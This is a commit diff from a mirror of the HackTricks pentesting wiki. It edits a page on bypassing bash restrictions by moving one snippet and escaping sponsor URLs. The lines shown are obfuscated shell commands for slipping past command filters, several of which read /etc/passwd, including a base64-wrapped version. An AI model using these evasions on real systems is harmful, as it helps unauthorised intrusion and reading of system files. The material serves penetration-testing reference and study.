Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4348: No subject

Browse source
This commit is contained in:
CPol 2024-06-05 15:10:13 +00:00 committed by gitbook-bot
parent 9f006fd993
commit e66f7e1e37
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 8 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
linux-hardening/bypass-bash-restrictions/README.md
View file

@ -17,7 +17,7 @@ Other ways to support HackTricks:
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
@ -80,7 +80,6 @@ $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami $(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64 bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
# Execution through $0 # Execution through $0
echo whoami|$0 echo whoami|$0
@ -88,6 +87,12 @@ echo whoami|$0
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
# New lines
p\
i\
n\
g # These 4 lines will equal to ping
# Fake commands # Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
@ -123,12 +128,6 @@ X=$'cat\x20/etc/passwd'&&$X
# Using tabs # Using tabs
echo "ls\x09-l" | bash echo "ls\x09-l" | bash
# New lines
p\
i\
n\
g # These 4 lines will equal to ping
# Undefined variables and ! # Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a uname!-1\-a # This equals to uname -a
@ -371,7 +370,7 @@ If you are inside a filesystem with the **read-only and noexec protections** or
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}